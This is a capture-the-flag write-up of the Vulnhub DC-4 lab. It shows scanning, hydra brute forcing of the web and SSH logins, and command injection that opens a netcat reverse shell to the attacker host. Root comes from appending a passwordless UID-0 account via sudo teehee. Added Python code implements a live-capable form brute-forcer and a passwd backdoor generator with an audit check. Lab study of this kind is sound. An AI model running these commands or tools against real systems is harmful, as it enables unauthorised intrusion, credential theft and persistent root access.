Disclaimer
This document is for study and research only. Do not use the techniques or source code described here for illegal purposes; the author is not responsible for any negative consequences caused by anyone.
Preface
Today's exercise is the DC-4 target machine:
Vulnhub is a platform offering vulnerable lab environments, most of them prebuilt virtual machine images seeded with several vulnerabilities. This post walks through the **DC-4 penetration test**: nmap scanning, dirsearch, password brute forcing with hydra (Burp Suite as an alternative), a netcat reverse shell, and privilege escalation through teehee.
1. Environment Setup
For the lab setup see the author's earlier posts; it is not repeated here:
Target download: https://download.vulnhub.com/dc/DC-4.zip
Setup reference, Vulnhub series DC-2: https://editor.csdn.net/md/?articleId=139026849
2. Information Gathering
2.1 Host Discovery
┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:b6:02:f0, IPv4: 192.168.6.66
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.6.1 00:50:56:c0:00:08 VMware, Inc.
192.168.6.2 00:50:56:f5:7b:9f VMware, Inc.
192.168.6.149 00:0c:29:69:33:da VMware, Inc.
192.168.6.254 00:50:56:fd:b7:3c VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.472 seconds (103.56 hosts/sec). 4 responded
Excluding the Kali attack host itself (192.168.6.66) and the three 00:50:56:* addresses, which belong to the VMware host side, the target is:
IP address: 192.168.6.149
MAC address: 00:0c:29:69:33:da
2.2 Port Scan
┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV -oA dc-3 192.168.6.149
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-21 10:43 EDT
Nmap scan report for 192.168.6.149
Host is up (0.0014s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
| 256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_ 256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open http nginx 1.15.10
|_http-title: System Tools
|_http-server-header: nginx/1.15.10
MAC Address: 00:0C:29:69:33:DA (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.92 seconds
The scan shows two open ports: 22 (OpenSSH 7.4p1, the Debian 9 package) and 80 (nginx 1.15.10, page title "System Tools"). The -oA basename dc-3 in the command is a leftover from the DC-3 writeup; the output files still describe this host, but name them dc-4 to avoid mixing up reports.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
| 256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_ 256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open http nginx 1.15.10
|_http-title: System Tools
|_http-server-header: nginx/1.15.10
2.3 Fingerprinting
┌──(root㉿kali)-[/home/kali]
└─# whatweb -v 192.168.6.149
WhatWeb report for http://192.168.6.149
Status : 200 OK
Title : System Tools
IP : 192.168.6.149
Country : RESERVED, ZZ
Summary : HTML5, HTTPServer[nginx/1.15.10], nginx[1.15.10], PasswordField[password]
Detected Plugins:
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
String : nginx/1.15.10 (from server string)
[ PasswordField ]
find password fields
String : password (from field name)
[ nginx ]
Nginx (Engine-X) is a free, open-source, high-performance
HTTP server and reverse proxy, as well as an IMAP/POP3
proxy server.
Version : 1.15.10
Website : http://nginx.net/
HTTP Headers:
HTTP/1.1 200 OK
Server: nginx/1.15.10
Date: Tue, 21 May 2024 14:46:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Key information:
Summary : HTML5, HTTPServer[nginx/1.15.10], nginx[1.15.10], PasswordField[password]
The only lead is PasswordField[password]: the front page is a login form. Nothing else to work with here o(╥﹏╥)o
2.4 Directory Scan
┌──(root㉿kali)-[/home/kali]
└─# dirsearch -u 192.168.6.149 -e * -x 404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: 39772.zip | HTTP method: GET | Threads: 25 | Wordlist size: 9481
Output File: /home/kali/reports/_192.168.6.149/_24-05-21_10-59-10.txt
Target: http://192.168.6.149/
[10:59:10] Starting:
[10:59:41] 302 - 704B - /command.php -> index.php
[10:59:44] 301 - 170B - /css -> http://192.168.6.149/css/
[10:59:57] 301 - 170B - /images -> http://192.168.6.149/images/
[10:59:57] 403 - 556B - /images/
[10:59:58] 403 - 15B - /index.pHp
[11:00:04] 302 - 206B - /login.php -> index.php
Task Completed
The scan found /command.php and /login.php; both answer 302 to index.php, so they need a session. Keep command.php in mind for later ^ _ ^
One caveat about the command: the unquoted -e * was expanded by the shell to a file in the working directory (the banner reads "Extensions: 39772.zip"), so no real extension list was tested. Name the extensions explicitly, e.g. -e php,txt,bak, to get the intended coverage.
3. Penetration Testing
3.1 Browsing the Site
Open http://192.168.6.149 in a browser.
It is a login page headed "admin information systems login".
That practically hands us the username, admin; only the password is left to guess ( * ^ ▽ ^ * )
3.2 Brute Forcing with hydra
Burp Suite Intruder can brute force the form as well; it is not covered here. Interested readers can try "brute force, method 2" in the author's attached "DC-4 penetration test flowchart".
┌──(root㉿kali)-[/home/kali]
└─# hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.6.149 -vV http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" | grep http-post-form
[DATA] attacking http-post-form://192.168.6.149:80/login.php:username=^USER^&password=^PASS^:S=logout
[VERBOSE] Page redirected to http[s]://192.168.6.149:80/index.php
[VERBOSE] Page redirected to http[s]://192.168.6.149:80/index.php
.....
[VERBOSE] Page redirected to http[s]://192.168.6.149:80/index.php
[80][http-post-form] host: 192.168.6.149 login: admin password: happy
[VERBOSE] Page redirected to http[s]://192.168.6.149:80/index.php
[VERBOSE] Page redirected to http[s]://192.168.6.149:80/index.php
[VERBOSE] Page redirected to http[s]://192.168.6.149:80/index.php
[VERBOSE] Page redirected to http[s]://192.168.6.149:80/index.php
Brute force succeeded:
login: admin password: happy
The S=logout condition tells hydra to treat any response containing the string "logout" as a successful login (the word only appears once you are logged in, which is why the condition works), and the [VERBOSE] lines show it following the 302 to index.php on every attempt. The password is happy, and that genuinely makes me happy O(∩_∩)O haha~
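The logic behind the hydra command above, written out so the success-string check can be seen and calibrated, as an added example that is not code from the original post or from DC-4. Assumptions not taken from the page: fake_app_submit and always_logout_submit are constructed stand-ins for the target application (the real login.php is never shown), the admin password in the stand-in is set to happy to mirror the result above, and the constructed WORDLIST replaces rockyou.txt.

```python
"""Form brute force with a success-string check, the logic behind
hydra's http-post-form module and its "S=logout" condition.

Added example, not code from the original post or from DC-4 itself.
fake_app_submit / always_logout_submit are constructed stand-ins for
the target; the field names username/password are the ones the hydra
command uses."""
import urllib.parse
import urllib.request
from typing import Callable, Iterable, Optional

# A transport takes (username, password) and returns the final page body.
Submit = Callable[[str, str], str]


def http_submit(url: str, user_field: str = "username",
                pass_field: str = "password") -> Submit:
    """Real transport for a live target: POST the form and return the
    body after redirects (urllib follows the 302 to index.php, just as
    hydra's [VERBOSE] lines show it doing)."""
    def submit(username: str, password: str) -> str:
        data = urllib.parse.urlencode({user_field: username,
                                       pass_field: password}).encode()
        with urllib.request.urlopen(url, data=data, timeout=10) as resp:
            return resp.read().decode("utf-8", "replace")
    return submit


def fake_app_submit(username: str, password: str) -> str:
    """Constructed offline stand-in for the target application: the
    "logout" link exists only after a successful login."""
    if username == "admin" and password == "happy":
        return '<p>Welcome admin</p><a href="logout.php">logout</a>'
    return '<h1>admin information systems login</h1><form>...</form>'


def always_logout_submit(username: str, password: str) -> str:
    """Constructed application with a permanent "logout" nav link: the
    textbook false positive for a naive S= condition."""
    return '<nav><a href="logout.php">logout</a></nav><h1>login</h1>'


def calibrate(submit: Submit, username: str, marker: str) -> None:
    """Before spending a wordlist, send one deliberately wrong password.
    If the marker already appears, every guess would look like a hit,
    so stop and choose a different marker (or an F= failure string)."""
    body = submit(username, "surely-not-the-password-9f8e7d6c")
    if marker in body:
        raise ValueError(f"marker {marker!r} appears on a failed login")


def brute_force(submit: Submit, username: str, passwords: Iterable[str],
                marker: str = "logout") -> Optional[str]:
    """Return the first password whose response contains marker, or None."""
    calibrate(submit, username, marker)
    for candidate in passwords:
        if marker in submit(username, candidate):
            return candidate
    return None


# Constructed slice of a wordlist; rockyou.txt would be used for real.
WORDLIST = ["123456", "password", "admin", "happy", "letmein"]

if __name__ == "__main__":
    print(brute_force(fake_app_submit, "admin", WORDLIST))
```

Against a live target you would pass http_submit("http://192.168.6.149/login.php") as the transport and a generator over the wordlist file (stripping newlines) as passwords. The calibrate step is the check hydra does not do for you: if the login page itself carries the word "logout", S=logout reports the very first guess as valid, and the clean single hit above is only trustworthy because that was not the case here.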
3.3 Logging In
Log in to the admin page with the credentials found above.
There is a System Tools page with a "Command" entry; command execution?
Click Command.
The page says You are currently logged in
That matches the 302 dirsearch saw for /command.php: the command page is only reachable with a valid session.
The commands it offers are: ① List Files (ls -l) ② Disk Usage (du -h) ③ Disk Free (df -h)
3.4 Reverse Shell
3.4.1 Listen on Port 4567 on Kali
┌──(root㉿kali)-[/home/kali]
└─# nc -lvvp 4567
listening on [any] 4567 ...
3.4.2 Send the Payload with Burp Suite
3.4.2.1 Log in to the Target
Username: admin
Password: happy
3.4.2.2 Send the Payload
Intercept the form submission from the Command page in Burp and replace the submitted command value (one of ls -l, du -h, df -h) with the payload below. The server runs whatever string it receives, so the request now opens a shell back to Kali:
payload: nc 192.168.6.66 4567 -e /bin/bash
This only works because the target's nc build supports -e; if it does not, a bash /dev/tcp or mkfifo reverse shell does the same job.
3.4.2.3 Reverse Shell Received
└─# nc -lvvp 4567
listening on [any] 4567 ...
192.168.6.149: inverse host lookup failed: Host name lookup failure
connect to [192.168.6.66] from (UNKNOWN) [192.168.6.149] 34686
whoami
www-data
3.4.3 Upgrading to an Interactive Shell
python -c 'import pty;pty.spawn("/bin/sh")'
The raw nc shell has no terminal, so programs such as su cannot prompt properly; pty.spawn wraps the shell in a pseudo-terminal. After entering the command and pressing Enter, the prompt appears:
python -c 'import pty;pty.spawn("/bin/sh")'
$
3.4.4 Finding Passwords
3.4.4.1 Changing Directory
$ cd /home
cd /home
$ ls
ls
charles jim sam
$ cd jim
cd jim
$ ls
ls
backups mbox test.sh
$ cd backups
cd backups
$ ls
ls
old-passwords.bak
$
3.4.4.2 View the Password File
cat old-passwords.bak
3.4.4.3 Creating ssh-pass.txt
Copy the contents of old-passwords.bak, which www-data can read from jim's backups directory, into ssh-pass.txt on Kali to use as the SSH wordlist (252 entries, as hydra reports below).
3.5 Privilege Escalation
3.5.1 Brute Forcing SSH
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-4]
└─# hydra -l jim -P ssh-pass.txt -t 10 ssh://192.168.6.149
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-22 07:49:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 252 login tries (l:1/p:252), ~26 tries per task
[DATA] attacking ssh://192.168.6.149:22/
[STATUS] 110.00 tries/min, 110 tries in 00:01h, 142 to do in 00:02h, 10 active
[STATUS] 80.00 tries/min, 160 tries in 00:02h, 92 to do in 00:02h, 10 active
[22][ssh] host: 192.168.6.149 login: jim password: jibril04
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-22 07:52:48
Credentials obtained:
Username: jim
Password: jibril04
Hydra warned that SSH servers often cap concurrent unauthenticated connections (OpenSSH's MaxStartups); -t 10 worked here, but -t 4 is the safer default, otherwise dropped connections show up as silently missed passwords.
3.5.2 SSH Connection
3.5.2.1 SSH Login
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-4]
└─# ssh jim@192.168.6.149
jim@192.168.6.149's password:
Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Sun Apr 7 02:23:55 2019 from 192.168.0.100
jim@dc-4:~$ ls
backups mbox test.sh
3.5.2.2 Reading the Mail
The login banner said You have mail., so look at jim's mail spool:
jim@dc-4:~$ cd /var/spool/mail
jim@dc-4:/var/spool/mail$ ls
jim
jim@dc-4:/var/spool/mail$ cat jim
The mail reads:
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: charles@dc-4
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
(envelope-from charles@dc-4)
id 1hCjIX-0000kO-Qt
for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: E1hCjIX-0000kO-Qt@dc-4
From: Charles charles@dc-4
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O
Hi Jim,
I’m heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.
Password is: ^xHhA&hvim0y
See ya,
Charles
Password is: ^xHhA&hvim0y
The password is sitting in an email, O(∩_∩)O haha~
3.5.3 Switching to charles
Switch user with:
Username: charles
Password: ^xHhA&hvim0y
jim@dc-4:/var/spool/mail$ su charles
Password:
charles@dc-4:/var/spool/mail$
User switch succeeded.
3.5.4 sudo Privilege Escalation
3.5.4.1 Finding a Program Runnable as root
charles@dc-4:/var/spool/mail$ sudo -l
Matching Defaults entries for charles on dc-4:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User charles may run the following commands on dc-4:
(root) NOPASSWD: /usr/bin/teehee
charles may run the following as root without a password:
/usr/bin/teehee
3.5.4.2 Appending to /etc/passwd
charles@dc-4:/var/spool/mail$ echo "test::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
test::0:0:::/bin/bash
/etc/passwd has been modified. teehee is a renamed copy of tee: it copies its stdin into the file named on the command line, and because sudo runs it as root it can open /etc/passwd for writing. The -a flag appends; without it tee would truncate /etc/passwd and lock every account out. The appended line, field by field: user name test, empty password field (no password required), UID 0 and GID 0 (UID 0 is what makes an account root), empty GECOS and home directory, login shell /bin/bash. If a target's PAM configuration rejects an empty password field, put a hash generated with openssl passwd -1 in that field instead.
3.5.5 Switching to test (root)
charles@dc-4:/var/spool/mail$ su test
root@dc-4:/var/spool/mail#
After the switch the prompt already reads root@dc-4: the new account has UID 0, and the user name shown is resolved from that UID, for which root is the first match in /etc/passwd. No password was asked for because the password field is empty.
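How the appended line works and what it leaves behind, as an added example (not code from the post or from the DC-4 image): it models the teehee append on a constructed /etc/passwd sample, reproduces the page's exact line, and then runs the checks a responder or hardening script would use to catch it. The sample entries (UIDs, homes, the www-data line) are assumptions; only the user names root, charles, jim and sam come from the page, and teehee is assumed to behave like tee with -a meaning append.

```python
"""What `echo "test::0:0:::/bin/bash" | sudo teehee -a /etc/passwd`
appends, and how to spot the result afterwards.

Added example, not from the page. SAMPLE_PASSWD is a constructed file;
DC-4's real /etc/passwd is never shown."""
from dataclasses import dataclass
from typing import List


@dataclass
class PasswdEntry:
    name: str
    passwd: str   # "x": look in /etc/shadow; "": no password; a hash here is honoured directly
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str

    @classmethod
    def parse(cls, line: str) -> "PasswdEntry":
        f = line.split(":")
        if len(f) != 7:
            raise ValueError(f"bad passwd line: {line!r}")
        return cls(f[0], f[1], int(f[2]), int(f[3]), f[4], f[5], f[6])

    def format(self) -> str:
        return ":".join([self.name, self.passwd, str(self.uid), str(self.gid),
                         self.gecos, self.home, self.shell])


def backdoor_line(name: str = "test", passwd: str = "",
                  shell: str = "/bin/bash") -> str:
    """The page's payload. uid 0 / gid 0 is what makes the account root;
    an empty second field means su asks for nothing. If the target's PAM
    refuses empty passwords, pass a hash from `openssl passwd -1 <pw>`."""
    return PasswdEntry(name, passwd, 0, 0, "", "", shell).format()


# Constructed sample, not the target's real file.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
charles:x:1000:1000:Charles,,,:/home/charles:/bin/bash
jim:x:1001:1001:Jim,,,:/home/jim:/bin/bash
sam:x:1002:1002:Sam,,,:/home/sam:/bin/bash
"""


def append_as_teehee(passwd_text: str, line: str) -> str:
    """Model of `echo LINE | sudo teehee -a /etc/passwd` (tee -a appends;
    without -a the file would be truncated to the single new line)."""
    return passwd_text + line + "\n"


def audit(passwd_text: str) -> List[str]:
    """Checks to run over /etc/passwd after an incident or as a routine
    hardening test; each finding is exactly what this attack leaves."""
    findings: List[str] = []
    for raw in passwd_text.splitlines():
        if not raw.strip():
            continue
        e = PasswdEntry.parse(raw)
        if e.uid == 0 and e.name != "root":
            findings.append(f"extra uid-0 account: {e.name}")
        if e.passwd == "":
            findings.append(f"empty password field: {e.name}")
        elif e.passwd not in ("x", "*") and not e.passwd.startswith("!"):
            findings.append(f"password hash stored in /etc/passwd, not shadow: {e.name}")
    return findings


if __name__ == "__main__":
    print(backdoor_line())
    print(audit(SAMPLE_PASSWD))
    print(audit(append_as_teehee(SAMPLE_PASSWD, backdoor_line())))
```

The same audit applied to a live system is just audit(open("/etc/passwd").read()); a second UID-0 entry, an empty password field, or a hash stored outside /etc/shadow are each a finding on their own. The defensive lesson from the sudoers side is the same as for any tee-like binary: NOPASSWD on a program that writes to arbitrary files is root, whatever the program is called.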
3.5.6 Reading the Flag
root@dc-4:/var/spool/mail# find / -name *flag*
/usr/share/man/nl/man1/dpkg-buildflags.1.gz
/usr/share/man/de/man1/dpkg-buildflags.1.gz
/usr/share/man/man3/fesetexceptflag.3.gz
/usr/share/man/man3/fegetexceptflag.3.gz
/usr/share/man/man2/ioctl_iflags.2.gz
/usr/share/man/man1/dpkg-buildflags.1.gz
/usr/share/dpkg/buildflags.mk
/usr/include/linux/tty_flags.h
/usr/include/linux/kernel-page-flags.h
/usr/include/i386-linux-gnu/asm/processor-flags.h
/usr/include/i386-linux-gnu/bits/waitflags.h
/usr/bin/dpkg-buildflags
/usr/lib/i386-linux-gnu/perl/5.24.1/bits/waitflags.ph
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/eth0/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/system/cpu/cpu0/microcode/processor_flags
/sys/devices/virtual/net/lo/flags
/sys/module/scsi_mod/parameters/default_dev_flags
/root/flag.txt
/proc/sys/kernel/acpi_video_flags
/proc/kpageflags
root@dc-4:/var/spool/mail# cat /root/flag.txt
888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888
Congratulations!!!
Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.
If you enjoyed this CTF, send me a tweet via @DCAU7.
Summary
In the DC-4 exercise we used arp-scan, nmap, whatweb, dirsearch, hydra, Burp Suite and netcat. arp-scan and nmap found the host and its two open ports; dirsearch turned up command.php; hydra's http-post-form module brute forced the admin login; the System Tools command page ran a client-supplied command, which gave a netcat reverse shell as www-data; a password backup in jim's home fed a second hydra run against SSH; jim's mail contained charles's password; and charles's passwordless sudo on teehee let us append a UID-0 user to /etc/passwd and read the flag as root. The chain:
- Host discovery and port scanning with arp-scan and nmap
- Directory scanning with dirsearch (command.php, login.php)
- Brute forcing the web login with hydra (admin / happy)
- Command injection on the System Tools page, reverse shell with netcat, pty upgrade
- Brute forcing SSH with the old-passwords.bak wordlist (jim / jibril04)
- Reading charles's password from jim's mail, su to charles
- sudo teehee -a /etc/passwd to add a UID-0 user, su to it, read /root/flag.txt
References
- DC-4 environment: https://download.vulnhub.com/dc/DC-4.zip
- Using arp-scan: https://blog.csdn.net/newbeixue/article/details/123111543
- Detailed nmap tutorial: https://blog.csdn.net/smli_ng/article/details/105964486
- Detailed whatweb tutorial: https://zhuanlan.zhihu.com/p/396345123
- dirsearch tutorial: https://blog.csdn.net/m0_48574718/article/details/129244162
- hydra manual: https://zhuanlan.zhihu.com/p/397779150
- Burp Suite in detail: https://blog.csdn.net/Waffle666/article/details/111083913
- Detailed Netcat tutorial: https://zhuanlan.zhihu.com/p/397058259
- teehee privilege escalation: https://www.cnblogs.com/zlgxzswjy/p/16118468.html
- DC-4 penetration test flowchart (attachment)
- ssh-pass.txt (attachment)